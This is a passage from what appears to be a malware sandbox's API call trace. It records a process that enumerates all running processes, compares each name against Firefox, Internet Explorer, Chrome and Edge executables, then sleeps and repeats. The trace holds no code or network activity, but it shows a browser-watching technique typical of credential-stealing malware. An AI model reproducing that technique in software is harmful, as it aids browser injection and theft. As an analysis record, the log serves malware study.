lpString2="chrome.exe") returned 1 [0186.586] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0186.587] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0186.587] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0186.587] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0186.587] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.587] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0186.587] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0186.587] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0186.588] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0186.588] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.588] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0186.588] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0186.588] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0186.588] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0186.588] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.588] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0186.589] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0186.589] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0186.589] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0186.589] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.589] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0186.589] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0186.589] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0186.589] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0186.589] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.589] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.590] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0186.590] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0186.590] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0186.590] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.590] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.590] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.590] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.590] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.590] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.590] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0186.591] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0186.591] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0186.591] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0186.591] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.591] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.591] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.591] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.592] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.592] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.592] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.592] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0186.592] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0186.592] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0186.592] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.592] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.593] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.593] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.593] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.593] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.593] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.593] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.593] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.593] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.593] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.593] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.594] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0186.594] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0186.594] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0186.594] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.594] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.594] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0186.594] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0186.594] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0186.594] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.594] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.595] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.595] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.596] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.596] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.596] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.596] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.596] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.596] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.597] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0186.597] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0186.597] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0186.597] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0186.597] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0186.597] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0186.597] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0186.597] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0186.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0186.598] CloseHandle (hObject=0xd4) returned 1 [0186.598] Sleep (dwMilliseconds=0x3e8) [0187.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0187.604] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.605] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0187.605] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0187.605] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0187.605] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0187.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.606] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0187.606] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0187.606] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0187.606] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0187.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.606] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0187.606] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0187.606] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0187.606] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.607] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0187.607] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0187.607] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0187.607] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.607] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0187.607] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0187.607] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0187.607] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.608] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0187.608] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0187.608] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0187.608] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.608] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.609] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0187.609] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0187.609] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0187.609] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.609] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.609] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0187.609] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0187.609] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0187.609] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.609] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.610] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0187.610] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0187.610] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0187.610] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.610] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0187.610] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0187.610] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0187.610] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0187.610] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.610] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.611] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.611] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.611] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.611] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.611] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.612] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.612] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.612] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.613] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.613] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.613] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0187.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0187.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0187.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.614] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.615] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.616] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0187.616] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0187.616] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0187.616] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.616] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0187.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0187.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0187.617] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.617] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0187.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0187.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0187.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.617] Process32Next 